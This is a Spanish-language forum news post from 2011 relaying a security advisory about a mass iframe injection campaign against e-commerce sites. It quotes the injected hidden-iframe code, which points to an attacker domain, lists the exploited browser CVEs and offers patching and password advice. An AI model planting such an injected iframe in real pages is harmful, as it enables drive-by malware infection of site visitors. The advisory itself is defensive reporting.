elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Foros Generales
| |-+  Foro Libre
| | |-+  Noticias (Moderadores: wolfbcn, El_Andaluz)
| | | |-+  Inyección masiva de iframes a sitios de e-commerce
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Inyección masiva de iframes a sitios de e-commerce  (Leído 1,928 veces)
@Sthéfano

Desconectado Desconectado

Mensajes: 98

Security & Programming ~


Ver Perfil
Inyección masiva de iframes a sitios de e-commerce
« en: 30 Julio 2011, 03:39 am »

Un grupo de investigadores publicó en su blog, una nueva alerta de un ataque masivo a páginas con inyección de iframe activo, que estuvo particularmente focalizado en sitios de e-commerce. El ataque fue reportado con más de 90 mil páginas afectadas. El iframe permite la ejecución de contenido externo en la página que se está visitando. De esta forma, los visitantes de todos los sitios afectados podían infectarse con malware por el solo hecho de visitar un sitio web de confianza.

A través de diversas vulnerabilidades, todas las páginas afectadas se encuentran con la siguiente inyección de iframe:


Código
  1. <title>Wholesaler<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe></title>

Una vez que el usuario visita alguna de las web infectadas, se ejecuta en la maquina del usuario, a través de un ataque multi-stage, código javascript que explota las siguientes vulnerabilidades que afectan al explorador web:

  • CVE-2010-0840 – Java Trust
  • CVE-2010-0188 – PDF LibTiff
  • CVE-2010-0886 – Java SMB
  • CVE-2006-0003 – IE MDAC
  • CVE-2010-1885 – HCP

Los dominios donde se alojan los exploit se encuentran en Rusia y son bloqueadas por nuestro software de seguridad. Analizando los sitios donde se encontraba presente este iframe, pudimos encontrar que estos son sensibles a inyecciones de SQL.

Es por eso que ante estos casos, si un desarrollador se encuentra ante este problema, debería revisar el código fuente de todas las páginas del sitio, para buscar este tipo de contenido no legítimo y verificar si el sitio web está infectado. Así también es importante tener en cuenta los siguientes consejos:

  • Que todas las contraseñas del FTP sean rotadas y se utilicen contraseñas fuertes para todos los usuarios. También se recomienda borrar usuarios que no estén en uso.
  • Que el sistema operativo no tenga vulnerabilidades, es decir que que todas las actualizaciones de software estén instaladas.
  • Que las aplicaciones (especialmente la aplicación web o el gestor de contenidos) también tengan todos los parches de seguridad instalados.

Vale destacar que, a este momento, se encuentran en el mismo enlace del buscador provisto por los investigadores, muchos más sitios web infectados por el mismo incidente:


El código malicioso que se descarga en el último paso del ataque, es un troyano.

Fuente: http://blog.armorize.com/
Adaptación: Laboratorios ESET


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
E-commerce MAGENTO
PHP
gerwin86 6 4,363 Último mensaje 13 Diciembre 2010, 01:50 am
por gerwin86
como crear un E-Commerce
Desarrollo Web
_vicho_ 1 2,011 Último mensaje 23 Noviembre 2011, 12:29 pm
por el-brujo
54 sitios israelíes han sido alterados, los hacktivistas preparan una masiva ...
Noticias
wolfbcn 0 2,023 Último mensaje 10 Marzo 2013, 02:06 am
por wolfbcn
Wordpress - Woocomerce & E-Commerce.
Desarrollo Web
WIитX 1 1,497 Último mensaje 29 Marzo 2014, 14:33 pm
por #!drvy
E-commerce
PHP
nahub96 2 1,401 Último mensaje 30 Marzo 2015, 21:35 pm
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines